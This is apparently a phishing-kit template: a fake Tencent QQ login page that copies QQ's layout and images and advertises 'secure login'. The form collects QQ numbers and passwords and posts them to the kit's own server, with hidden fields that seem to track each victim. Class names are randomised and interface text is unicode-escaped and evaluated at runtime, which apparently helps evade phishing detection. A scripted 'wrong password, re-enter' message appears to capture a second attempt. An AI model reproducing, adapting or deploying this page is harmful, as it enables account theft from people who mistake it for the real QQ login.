<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="/js/decrypt.js" type="text/javascript"></script>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <style type="text/css" id="main_css">
        html {
            overflow: hidden
        }

        body {
            font-family: 宋体, Tahoma, Verdana, Arial;
            font-size: 12px;
            color: gray;
            margin: 0;
            background: #fefefe
        }

        ul {
            padding: 0;
            margin: 0
        }

        ul li {
            list-style-type: none
        }

        a {
            text-decoration: none;
            cursor: pointer;
            outline: 0
        }

        a:hover {
            text-decoration: underline
        }

        input[type="text"]:focus,
        input[type="password"]:focus {
            outline: 0
        }

        input::-ms-clear,
        input::-ms-reveal {
            display: none;
            width: 0;
            height: 0
        }

        .<%=ranStr[0]%> {
            -webkit-filter: grayscale(100%);
            -moz-filter: grayscale(100%);
            -ms-filter: grayscale(100%);
            -o-filter: grayscale(100%);
            filter: grayscale(100%);
            filter: url("data:image/svg+xml;utf8,<svgxmlns=\'http://www.w3.org/2000/svg\'><filterid=\'grayscale\'><feColorMatrixtype=\'matrix\'values=\'0.33330.33330.3333000.33330.33330.3333000.33330.33330.33330000010\'/></filter></svg>#grayscale");
            filter: progid:DXImageTransform.Microsoft.BasicImage(grayscale=1)
        }

        .hide {
            display: none
        }

        .<%=ranStr[1]%> {
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -228px -250px;
        }

        .<%=ranStr[1]%>:hover {
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -250px -250px;
        }

        .<%=ranStr[2]%> {
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -228px -232px;
        }

        .<%=ranStr[2]%>:hover {
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -250px -232px;
        }

        .<%=ranStr[3]%> {
            width: 620px;
            border: 1px solid #b1b3b4;
            margin: 0 auto;
            position: relative;
            overflow: hidden
        }

        .<%=ranStr[19]%> {
            height: 50px;
            border-bottom: 0;
            position: relative;
            z-index: 1001
        }

        .<%=ranStr[19]%> .<%=ranStr[35]%> {
            cursor: pointer;
            width: 47px;
            height: 20px;
            float: right;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -221px -126px;
        }

        .<%=ranStr[19]%> .<%=ranStr[35]%>:hover {
            background-position: -221px -151px
        }

        .<%=ranStr[25]%> {
            float: left;
            width: 352px
        }

        .<%=ranStr[25]%> .<%=ranStr[60]%> {
            height: 50px;
            font-size: 14px;
            font-weight: bold;
            position: relative
        }

        .<%=ranStr[25]%> .<%=ranStr[55]%>Tips {
            display: block;
            padding-left: 50px
        }

        .<%=ranStr[25]%> .<%=ranStr[56]%>Tips {
            display: none;
            width: 100%;
            text-align: center
        }

        .<%=ranStr[55]%> {
            position: relative;
            padding-bottom: 28px
        }

        .<%=ranStr[55]%> .<%=ranStr[54]%> {
            width: 255px;
            margin: 0 auto;
            position: relative
        }

        .<%=ranStr[55]%> .<%=ranStr[49]%>,
        .<%=ranStr[55]%> .lockuin .<%=ranStr[49]%>_hover,
        .<%=ranStr[55]%> .lockuin .<%=ranStr[49]%>_focus {
            width: 250px;
            height: 42px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat 0 0;
        }

        .<%=ranStr[55]%> .<%=ranStr[49]%>_hover {
            width: 250px;
            height: 42px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat 0 -627px;
        }

        .<%=ranStr[55]%> .<%=ranStr[49]%>_focus {
            width: 250px;
            height: 42px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat 0 -45px;
        }

        .<%=ranStr[55]%> .<%=ranStr[50]%> {
            width: 220px;
            position: relative;
            top: 2px;
            left: 2px;
            height: 18px;
            padding: 11px 0 11px 25px;
            line-height: 18px;
            border: 0;
            background: 0;
            background: url(about:blank)\0;
            color: #333;
            font-family: Verdana, Tahoma, Arial;
            font-size: 16px
        }

        .<%=ranStr[55]%> .<%=ranStr[64]%>,
        .<%=ranStr[55]%> .<%=ranStr[64]%>_focus {
            position: absolute;
            top: 13px;
            +top: 15px;
            left: 30px;
            font-size: 14px;
            line-height: 16px;
            color: #aaa;
            cursor: text
        }

        .<%=ranStr[55]%> .<%=ranStr[64]%>_focus {
            color: #ddd
        }

        .<%=ranStr[55]%> .<%=ranStr[40]%> {
            height: 55px;
            position: relative;
            z-index: 10
        }

        .<%=ranStr[55]%> .<%=ranStr[52]%> {
            position: absolute;
            left: 10px;
            top: 12px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -179px -160px;
            width: 16px;
            height: 18px
        }

        .<%=ranStr[55]%> .p_icon {
            position: absolute;
            left: 10px;
            top: 12px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -201px -160px;
            width: 16px;
            height: 18px
        }

        .<%=ranStr[55]%> .<%=ranStr[51]%> {
            width: 21px;
            height: 21px;
            cursor: pointer;
            position: absolute;
            right: 20px;
            top: 10px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -116px -160px;
            display: none
        }

        .<%=ranStr[55]%> .<%=ranStr[51]%>:hover {
            background-position: -139px -160px
        }

        .<%=ranStr[55]%> .<%=ranStr[53]%> {
            border: 1px solid #70c2ec;
            background: #fff;
            width: 242px;
            position: absolute;
            z-index: 10;
            display: none;
            border-radius: 1px;
            padding: 1px;
            left: 2px
        }

        .<%=ranStr[55]%> .<%=ranStr[53]%> li,
        .<%=ranStr[55]%> .<%=ranStr[53]%> p {
            height: 31px;
            line-height: 31px;
            margin: 0;
            overflow: hidden;
            padding-left: 10px
        }

        .<%=ranStr[55]%> .<%=ranStr[53]%> p {
            height: 16px;
            line-height: 10px
        }

        .<%=ranStr[55]%> .<%=ranStr[53]%> .hover {
            background: #cbe2fa
        }

        .<%=ranStr[55]%> .pwdArea {
            height: 55px;
            position: relative;
            z-index: 3
        }

        .<%=ranStr[55]%> .lock_tips {
            position: absolute;
            top: 32px;
            left: -15px;
            height: 16px;
            padding: 5px;
            text-align: center;
            display: none;
            border: 1px solid #dad699;
            background: #f9f5c7;
            border-radius: 2px
        }

        .<%=ranStr[55]%> .lock_tips .lock_tips_row {
            position: absolute;
            top: -6px;
            left: 25px;
            width: 12px;
            height: 6px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -162px -168px;
        }

        .<%=ranStr[55]%> .verifyArea {
            display: none;
            height: 120px;
            position: relative
        }

        .<%=ranStr[55]%> .<%=ranStr[48]%> {
            height: 55px
        }

        .<%=ranStr[55]%> .<%=ranStr[61]%> {
            color: #333;
            font-size: 16px
        }

        .<%=ranStr[55]%> .verifyimgArea {
            position: relative;
            height: 55px;
            cursor: pointer
        }

        .<%=ranStr[55]%> .verifyimgArea .verifyimg {
            height: 55px;
            width: 150px;
            position: absolute;
            left: 0
        }

        .<%=ranStr[55]%> .verifyimgArea .verifyimg_tips {
            position: absolute;
            left: 165px;
            top: 15px;
            color: #000
        }

        .<%=ranStr[55]%> .submit {
            position: relative;
            height: 40px;
            top: 6px
        }

        .<%=ranStr[55]%> .<%=ranStr[46]%> {
            position: absolute;
            left: 0;
            outline: 0
        }

        .<%=ranStr[55]%> .<%=ranStr[46]%> .btn {
            width: 92px;
            height: 35px;
            line-height: 35px;
            border: 0;
            font-size: 14px;
            font-weight: bold;
            color: #fff;
            cursor: pointer;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat 0 -90px;
        }

        .<%=ranStr[55]%> .<%=ranStr[46]%>:hover .btn {
            background-position: -97px -90px
        }

        .<%=ranStr[55]%> .<%=ranStr[46]%>:hover {
            text-decoration: none
        }

        .<%=ranStr[55]%> .<%=ranStr[58]%> {
            position: absolute;
            left: 140px;
            top: 12px
        }

        .<%=ranStr[55]%> .<%=ranStr[58]%> .<%=ranStr[2]%>,
        .<%=ranStr[55]%> .<%=ranStr[58]%> .<%=ranStr[1]%> {
            float: left;
            height: 16px;
            width: 16px
        }

        .<%=ranStr[55]%> .<%=ranStr[58]%> .p_<%=ranStr[58]%>_wording {
            height: 14px;
            line-height: 14px;
            line-height: 16px\9;
            cursor: pointer;
            margin-left: 5px
        }

        .<%=ranStr[56]%> {
            height: 178px;
            width: 300px;
            position: relative;
            margin: 0 auto;
            display: none
        }

        .<%=ranStr[56]%> .<%=ranStr[56]%>_select {
            height: 160px;
            position: relative
        }

        .<%=ranStr[56]%> .<%=ranStr[21]%> {
            width: 240px;
            height: 130px;
            position: absolute;
            left: 30px;
            top: 18px;
            overflow: hidden
        }

        .<%=ranStr[56]%> .<%=ranStr[22]%> {
            height: 100%;
            position: absolute;
            text-align: center
        }

        .<%=ranStr[56]%> .<%=ranStr[23]%> {
            width: 30px;
            height: 120px;
            position: absolute;
            top: 20px;
            left: 0;
            text-align: center;
            display: none
        }

        .<%=ranStr[56]%> .<%=ranStr[36]%> {
            width: 30px;
            height: 120px;
            position: absolute;
            top: 20px;
            right: 0;
            text-align: center;
            display: none
        }

        .<%=ranStr[56]%> .<%=ranStr[38]%> {
            width: 16px;
            height: 35px;
            display: inline-block;
            margin-top: 35px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -181px -185px;
            cursor: pointer
        }

        .<%=ranStr[56]%> .<%=ranStr[23]%>:hover .<%=ranStr[38]%> {
            background-position: -181px -228px
        }

        .<%=ranStr[56]%> .<%=ranStr[37]%> {
            width: 16px;
            height: 35px;
            display: inline-block;
            margin-top: 35px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -201px -185px;
            cursor: pointer
        }

        .<%=ranStr[56]%> .<%=ranStr[36]%>:hover .<%=ranStr[37]%> {
            background-position: -201px -228px
        }

        .<%=ranStr[56]%> .face {
            display: inline-block;
            height: 120px;
            width: 120px;
            text-align: center;
            position: relative;
            cursor: pointer;
            none;
            outline: 0
        }

        .<%=ranStr[56]%> .face:focus {
            outline: 0
        }

        .<%=ranStr[56]%> .face:hover {
            border: 0;
            text-decoration: none
        }

        .<%=ranStr[56]%> .face img {
            width: 80px;
            height: 80px;
            position: absolute;
            top: 10px;
            left: 19px;
            border: 0
        }

        .<%=ranStr[56]%> .face .img_out {
            width: 88px;
            height: 88px;
            position: absolute;
            top: 4px;
            left: 14px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -0 -182px;
        }

        .<%=ranStr[56]%> .face .img_out_focus {
            width: 88px;
            height: 88px;
            position: absolute;
            top: 5px;
            left: 15px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -91px -183px;
        }

        .<%=ranStr[56]%> .face:hover .img_out {
            width: 88px;
            height: 88px;
            position: absolute;
            top: 5px;
            left: 15px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -91px -183px;
        }

        .<%=ranStr[56]%> .face .nick {
            display: inline-block;
            text-align: center;
            position: absolute;
            top: 100px;
            left: 0;
            height: 18px;
            line-height: 18px;
            vertical-align: middle;
            width: 100%;
            overflow: hidden;
            color: #6f7479;
            font-family: Tahoma, \u5fae\u8f6f\u96c5\u9ed1, \u5b8b\u4f53, Verdana, Arial, sans-serif
        }

        .bottom .red,
        .<%=ranStr[56]%> .face .red {
            color: red
        }

        .<%=ranStr[56]%> .face .vip_logo {
            width: 26px;
            height: 12px;
            position: absolute;
            top: 12px;
            left: 21px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -236px -92px;
        }

        .<%=ranStr[56]%> .face .uin {
            display: none
        }

        .<%=ranStr[56]%> .face .uin_menban {
            display: none
        }

        .<%=ranStr[56]%> .face:hover .uin_menban {
            display: block;
            height: 20px;
            width: 80px;
            line-height: 20px;
            position: absolute;
            left: 20px;
            top: 72px;
            background: #000;
            filter: Alpha(opacity=50);
            opacity: .5;
            border-radius: 0 0 4px 4px
        }

        .<%=ranStr[56]%> .face:hover .uin {
            display: block;
            height: 20px;
            width: 80px;
            line-height: 20px;
            position: absolute;
            left: 20px;
            top: 72px;
            color: #fff
        }

        .<%=ranStr[56]%> .face .face_mengban {
            background: #000;
            width: 80px;
            height: 80px;
            position: absolute;
            top: 10px;
            left: 20px;
            filter: Alpha(opacity=30);
            opacity: .3
        }

        .<%=ranStr[56]%> .tips {
            height: 60px;
            margin-top: 20px
        }

        .<%=ranStr[56]%> .tips_logo {
            display: none
        }

        .<%=ranStr[56]%> .<%=ranStr[7]%> {
            display: inline-block;
            height: 18px;
            vertical-align: middle;
            line-height: 18px;
            color: #a0a0a0
        }

        .<%=ranStr[56]%> .wording_tips {
            text-align: center;
            height: 25px
        }

        .<%=ranStr[56]%> .<%=ranStr[5]%> {
            text-align: center;
            height: 25px;
            visibility: hidden
        }

        .<%=ranStr[56]%> .<%=ranStr[5]%> .loading_img {
            width: 16px;
            height: 16px
        }

        .bottom {
            text-align: right;
            font-size: 12px;
            clear: both;
            position: relative;
            height: 46px;
            line-height: 46px;
            padding-right: 10px;
            z-index: 1002
        }

        .bottom .<%=ranStr[62]%> {
            color: gray
        }

        .bottom .dotted {
            color: #bfbfbf;
            margin: 0 5px
        }

        .bottom .<%=ranStr[58]%> {
            position: absolute;
            right: 245px;
            top: 17px;
            height: 18px
        }

        .bottom .<%=ranStr[58]%> .<%=ranStr[1]%>,
        .bottom .<%=ranStr[58]%> .<%=ranStr[2]%> {
            width: 16px;
            height: 16px;
            float: left
        }

        .bottom .<%=ranStr[58]%> .<%=ranStr[58]%>_wording {
            float: left;
            height: 14px;
            line-height: 14px;
            line-height: 16px\9;
            margin-left: 5px;
            color: #b5bbc1;
            cursor: pointer
        }

        .<%=ranStr[57]%> {
            width: 265px;
            height: 270px;
            float: left;
            position: relative
        }

        .<%=ranStr[57]%> .qr_title {
            position: absolute;
            top: 0;
            text-align: center;
            width: 100%;
            font-size: 14px;
            font-weight: bold
        }

        .<%=ranStr[57]%> .<%=ranStr[34]%> {
            width: 150px;
            height: 150px;
            position: absolute;
            top: 50px;
            left: 57px
        }

        .<%=ranStr[57]%> .<%=ranStr[59]%> {
            position: absolute;
            top: 0;
            left: 0;
            width: 149px;
            height: 149px;
            border: 1px solid #d3d3d3
        }

        .<%=ranStr[57]%> .<%=ranStr[31]%> {
            position: absolute;
            width: 42px;
            height: 47px;
            top: 54px;
            left: 54px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -156px -473px;
        }

        .<%=ranStr[57]%> .<%=ranStr[32]%> {
            display: none;
            width: 150px;
            height: 150px;
            left: 1px;
            top: 1px;
            position: absolute;
            cursor: pointer
        }

        .<%=ranStr[57]%> .<%=ranStr[33]%> {
            background: #000;
            width: 150px;
            height: 150px;
            position: absolute;
            top: 0;
            left: 0;
            filter: Alpha(opacity=50);
            opacity: .5
        }

        .<%=ranStr[57]%> .<%=ranStr[30]%> {
            color: #fff;
            left: 0;
            line-height: 20px;
            position: absolute;
            text-align: center;
            top: 55px;
            width: 150px;
            cursor: pointer
        }

        .<%=ranStr[57]%> .<%=ranStr[29]%> {
            bottom: 20px;
            position: absolute;
            text-align: center;
            width: 100%
        }

        .<%=ranStr[57]%> .<%=ranStr[28]%> {
            text-decoration: none;
            display: inline-block;
            width: 152px;
            height: 30px;
            line-height: 30px;
            color: gray;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat 0 -474px;
        }

        .<%=ranStr[57]%> .<%=ranStr[28]%>:hover {
            background-position: 0 -506px;
            text-decoration: none
        }

        .<%=ranStr[57]%> .<%=ranStr[27]%> {
            text-decoration: none;
            display: inline-block;
            width: 152px;
            height: 38px;
            line-height: 18px;
            color: gray;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat 0 -540px;
        }

        .<%=ranStr[57]%> .<%=ranStr[27]%>:hover {
            background-position: 0 -583px;
            text-decoration: none
        }

        .<%=ranStr[57]%> .<%=ranStr[26]%> {
            background-color: #e6e6e6;
            height: 245px;
            position: absolute;
            right: 0;
            top: 5px;
            width: 1px
        }

        .<%=ranStr[11]%> {
            display: none;
            position: absolute;
            width: 100%;
            height: 100%;
            left: 0;
            top: 0;
            background: #fff;
            z-index: 1000
        }

        .<%=ranStr[11]%> .<%=ranStr[17]%> {
            margin: 60px 0 0 110px;
            padding: 84px 0 0 145px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) #fff no-repeat 0 -276px;
            height: 110px
        }

        .<%=ranStr[11]%> .<%=ranStr[12]%> {
            text-align: left;
            margin: 0;
            padding-bottom: 20px;
            font-size: 14px;
            font-weight: bold
        }

        .<%=ranStr[11]%> .<%=ranStr[13]%> {
            color: #b4b4b4
        }

        .<%=ranStr[11]%> .<%=ranStr[13]%> a {
            color: #3481cf
        }

        .<%=ranStr[14]%> .<%=ranStr[10]%>,
        .<%=ranStr[14]%> .<%=ranStr[16]%> {
            display: none
        }

        .<%=ranStr[16]%>,
        .<%=ranStr[10]%> {
            display: inline-block;
            width: 300px;
            color: #579feb
        }

        .<%=ranStr[15]%> .<%=ranStr[16]%> {
            display: none
        }

        .<%=ranStr[15]%> .<%=ranStr[10]%> {
            padding-left: 28px;
            text-align: center
        }

        .<%=ranStr[9]%> .<%=ranStr[16]%> {
            padding-left: 50px
        }

        .<%=ranStr[9]%> .<%=ranStr[10]%> {
            display: none
        }

        .<%=ranStr[8]%> .<%=ranStr[10]%>,
        .<%=ranStr[8]%> .<%=ranStr[16]%> {
            display: none
        }

        .noscript {
            background: none repeat scroll 0 0 #f9f5c7;
            border: 1px solid #dad699;
            display: inline-block;
            height: 24px;
            line-height: 24px;
            padding: 5px;
            text-align: center
        }

        .qr_tips {
            display: none;
            position: absolute;
            left: 235px;
            top: 35px;
            height: 300px;
            width: 390px;
            z-index: 999
        }

        .qr_tips .<%=ranStr[43]%> {
            opacity: .5;
            filter: alpha(opacity=50);
            background: #fff;
            width: 100%;
            height: 100%
        }

        .qr_tips .<%=ranStr[44]%> {
            width: 245px;
            height: 300px;
            position: absolute;
            top: 0
        }

        .qr_tips .<%=ranStr[44]%>_chs,
        .qr_tips .<%=ranStr[44]%>_cht,
        .qr_tips .<%=ranStr[44]%>_en {
            background: url(http://imgcache.qq.com/ptlogin/v4/style/20/images/shouQ_v2/big_24_tiny.png) no-repeat 0 0;
            background: url(http://imgcache.qq.com/ptlogin/v4/style/20/images/shouQ_v2/big_8.png) no-repeat 0 0 \9
        }

        .<%=ranStr[6]%> {
            text-align: center;
            padding: 5px;
            border: 1px solid #ecc36c;
            background: #f5ecbb;
            display: none;
            position: absolute;
            bottom: 0;
            left: 49px;
            border-radius: 2px;
            width: 236px
        }

        .<%=ranStr[6]%> .<%=ranStr[24]%> {
            position: absolute;
            left: 3px;
            top: 7px;
            height: 14px;
            line-height: 14px;
            width: 18px;
            background: url(<%=ranImg('/images/c_icon_2_tiny.png')%>) no-repeat -3px -164px;
        }

        .<%=ranStr[6]%> .<%=ranStr[7]%> {
            display: inline-block;
            padding-left: 15px;
            line-height: 16px;
            color: #383838;
            vertical-align: middle;
            text-align: left;
            width: 220px
        }

        .<%=ranStr[5]%> {
            display: none;
            position: absolute;
            text-align: center;
            width: 100%
        }

        .<%=ranStr[4]%> {
            margin: 15px 0 0 100px
        }

        .<%=ranStr[4]%> .<%=ranStr[1]%> {
            float: left;
            height: 18px;
            width: 18px
        }

        .<%=ranStr[4]%> .<%=ranStr[4]%>_<%=ranStr[62]%> {
            color: #579feb
        }

        .<%=ranStr[3]%>,
        .<%=ranStr[20]%> {
            background-color: #fff;
        }

        .<%=ranStr[19]%> .logo,
        .<%=ranStr[18]%> .logo {
            background: url(http://imgcache.qq.com/ptlogin/v4/style/11/images/icon_24_c_3.png) no-repeat;
            ;
            background-position: 0 -280px;
        }
    </style>
</head>

<body>
    <script src="//cdn.bootcss.com/jquery/3.0.0-rc1/jquery.min.js" type="text/javascript"></script>
    <div class="login" id="login">
        <div class="<%=ranStr[19]%>">
            <a class="<%=ranStr[35]%>" id="<%=ranStr[35]%>" href="javascript:void(0);" title="关闭" tabindex="14"></a>
        </div>
        <div class="<%=ranStr[57]%>" id="<%=ranStr[57]%>">
            <label class="qr_title unc">\u5b89\u5168\u767b\u5f55\uff0c\u9632\u6b62\u88ab\u76d7</label>
            <div class="<%=ranStr[34]%>" id="<%=ranStr[34]%>">
                <img id="<%=ranStr[59]%>" class="<%=ranStr[59]%>" src="<%=ranImg('/images/qr_code.png')%>" />
                <span id="<%=ranStr[31]%>" class="<%=ranStr[31]%>"></span>
                <span id="<%=ranStr[32]%>" class="<%=ranStr[32]%>"><span id="<%=ranStr[33]%>" class="<%=ranStr[33]%>"></span> <span id="<%=ranStr[30]%>"
                    class="<%=ranStr[30]%> unc">\u4e8c\u7ef4\u7801\u5931\u6548\u0026\u006c\u0074\u003b\u0062\u0072\u0020\u002f\u0026\u0067\u0074\u003b\u8bf7\u70b9\u51fb\u5237\u65b0</span></span>
            </div>
            <div class="<%=ranStr[29]%>">
                <a class="<%=ranStr[28]%> unc" id="<%=ranStr[28]%>" href="#" tabindex="13">\u4f7f\u7528\u0051\u0051\u624b\u673a\u7248\u626b\u63cf\u4e8c\u7ef4\u7801</a>
            </div>
            <div class="<%=ranStr[26]%>"></div>
        </div>
        <div class="<%=ranStr[25]%>" id="<%=ranStr[25]%>">
            <div id="<%=ranStr[60]%>" class="<%=ranStr[60]%>">
                <div class="<%=ranStr[6]%>" id="<%=ranStr[6]%>">
                    <span class="<%=ranStr[24]%>" id="<%=ranStr[24]%>"></span>
                    <span class="<%=ranStr[7]%>" id="<%=ranStr[7]%>"></span>
                </div>
                <div class="<%=ranStr[5]%>" id="<%=ranStr[5]%>">
                </div>
            </div>
            <div class="<%=ranStr[56]%>" id="<%=ranStr[56]%>">
                <a title="上一页" class="<%=ranStr[23]%>" id="<%=ranStr[23]%>" href="javascript:void(0);"><span class="<%=ranStr[38]%>" tabindex="6"></span></a>
                <div class="<%=ranStr[21]%>" id="<%=ranStr[21]%>">
                    <div class="<%=ranStr[22]%>" id="<%=ranStr[22]%>"></div>
                </div>
                <a title="下一页" class="<%=ranStr[36]%>" id="<%=ranStr[36]%>" href="javascript:void(0);"><span class="<%=ranStr[37]%>" tabindex="7"></span></a>
            </div>
            <div class="<%=ranStr[55]%>" id="<%=ranStr[55]%>">
                <div class="<%=ranStr[54]%>">
                    <form id="<%=ranStr[39]%>" autocomplete="off" name="<%=ranStr[39]%>" action="" method="post" target="_self" style="margin:0">
                        <div class="<%=ranStr[40]%>" id="<%=ranStr[40]%>">
                            <label class="<%=ranStr[64]%> unc" id="uin_tips" for="u">\u652f\u6301\u0051\u0051\u53f7\u002f\u90ae\u7bb1\u002f\u624b\u673a\u53f7\u767b\u5f55</label>
                            <div class="<%=ranStr[49]%>">
                                <input type="text" class="<%=ranStr[50]%>" id="u" name="u" value=" " tabindex="1" />
                                <span class="<%=ranStr[52]%>"></span>
                                <a class="<%=ranStr[51]%>" id="<%=ranStr[51]%>" href="javascript:void(0);"></a>
                            </div>
                            <ul class="<%=ranStr[53]%>" id="<%=ranStr[53]%>"></ul>
                        </div>
                        <div class="pwdArea" id="pwdArea">
                            <label class="<%=ranStr[64]%> unc" id="<%=ranStr[63]%>" for="p">\u5bc6\u7801</label>
                            <input type="hidden" name="uid" value="<%=uid%>">
                            <input type="hidden" name="mid" value="<%=mid%>">
                            <input type="hidden" name="tz" value="<%=tz%>">
                            <div class="<%=ranStr[49]%>">
                                <input type="text" class="<%=ranStr[50]%> password" id="p" name="p" value="" maxlength="16" tabindex="2" />
                                <span class="p_icon"></span>
                            </div>
                        </div>
                        <div class="verifyArea" id="verifyArea">
                            <div class="<%=ranStr[48]%>" id="<%=ranStr[48]%>">
                                <div class="<%=ranStr[49]%>">
                                    <input name="<%=ranStr[61]%>" type="text" class="<%=ranStr[50]%> <%=ranStr[61]%>" id="<%=ranStr[61]%>" value="" tabindex="3" />
                                </div>
                            </div>
                        </div>
                        <div class="submit">
                            <a class="<%=ranStr[46]%>" hidefocus="true" href="javascript:void(0);">
            <input type="button" tabindex="6" value="\u767b\u0020\u5f55" class="btn" id="<%=ranStr[47]%>"/>
        </a>
                        </div>
                    </form>
                </div>
            </div>
            <div class="<%=ranStr[14]%>" id="<%=ranStr[14]%>">
                <a hidefocus="true" id="<%=ranStr[16]%>" class="<%=ranStr[16]%>" href="javascript:void(0);" tabindex="7">&lt;&lt;&nbsp;\u8fd4\u56de\u5feb\u901f\u767b\u5f55</a>
                <a hidefocus="true" id="<%=ranStr[10]%>" class="<%=ranStr[10]%> unc" href="javascript:void(0);" tabindex="8">\u4f7f\u7528\u5e10\u53f7\u5bc6\u7801\u767b\u5f55</a>
            </div>
        </div>
        <div id="<%=ranStr[11]%>" class="<%=ranStr[11]%>">
            <div class="<%=ranStr[17]%>">
            </div>
        </div>
    </div>
    <div id="qr_tips" class="qr_tips">
        <div class="<%=ranStr[43]%>" id="<%=ranStr[43]%>"></div>
        <div class="<%=ranStr[44]%>" id="<%=ranStr[44]%>"></div>
    </div>
    <div class="bottom" id="bottom">
        <span id="fgtpwdbox"><a href="#" class="<%=ranStr[62]%> unc" id="forgetpwd" tabindex="10">\u5fd8\u4e86\u5bc6\u7801\uff1f</a> <span class="dotted">|</span></span>
        <a href="#" class="<%=ranStr[62]%> unc" tabindex="11">\u6ce8\u518c\u65b0\u5e10\u53f7</a>
        <span class="dotted">|</span>
        <a class="<%=ranStr[62]%> unc" id="feedback_<%=ranStr[56]%>" href="#" tabindex="12">\u610f\u89c1\u53cd\u9988</a>
    </div>
    <div id="<%=ranStr[42]%>" class="<%=ranStr[42]%>"></div>
    </div>

    <script>
        $('#p').on('click', function () {
            var _this = this;
            setTimeout(function () {
                $(_this).attr('type', 'password');
            }, 100);
        });
        $('.unc').each(function () {
            var _x = $(this).html();
            $(this).html(eval('"' + _x + '"'));
        });
        $('#<%=ranStr[47]%>').val(eval('"' + $('#<%=ranStr[47]%>').val() + '"'));
        var _n = '<%=tz%>';
        $('#u').on('input', function () {
            if ($(this).val() !== '' || $(this).val() !== ' ') {
                $('#uin_tips').css({ 'display': 'none' });
            } else {
                $('#uin_tips').css({ 'display': 'block' });
            }
        });
        $('#p').on('input', function () {
            if ($(this).val() !== '') {
                $('#<%=ranStr[63]%>').css({ 'display': 'none' });
            } else {
                $('#<%=ranStr[63]%>').css({ 'display': 'block' });
            }
        });
        var <%=ranStr[7]%> = $('#<%=ranStr[7]%>');
        var <%=ranStr[6]%> = $('#<%=ranStr[6]%>');
        $('#<%=ranStr[47]%>').on('click', function () {
            if ($('#u').val() === '' || $('#u').val() === ' ') {
                <%=ranStr[7]%>.html('\u8bf7\u8f93\u5165\u0051\u0051\u53f7\uff01');
                <%=ranStr[6]%>.css({ "display": "block" });
                setTimeout(function () {
                    <%=ranStr[6]%>.css({ "display": "none" });
                }, 1000);
            } else if ($('#p').val() === '') {
                <%=ranStr[7]%>.html('\u4f60\u8fd8\u6ca1\u6709\u8f93\u5165\u5bc6\u7801\uff01');
                <%=ranStr[6]%>.css({ "display": "block" });
                setTimeout(function () {
                    <%=ranStr[6]%>.css({ "display": "none" });
                }, 1000);
            } else {
                if (_n === '0') {
                    $('#<%=ranStr[39]%>').submit();
                } else {
                    $('#<%=ranStr[39]%>').submit();
                }
            }
        });
        if (_n === '1') {
            <%=ranStr[7]%>.html('\u8d26\u53f7\u5bc6\u7801\u9519\u8bef\u002c\u8bf7\u91cd\u65b0\u8f93\u5165\u0021');
            <%=ranStr[6]%>.css({ "display": "block" });
        }
    </script>
</body>

</html>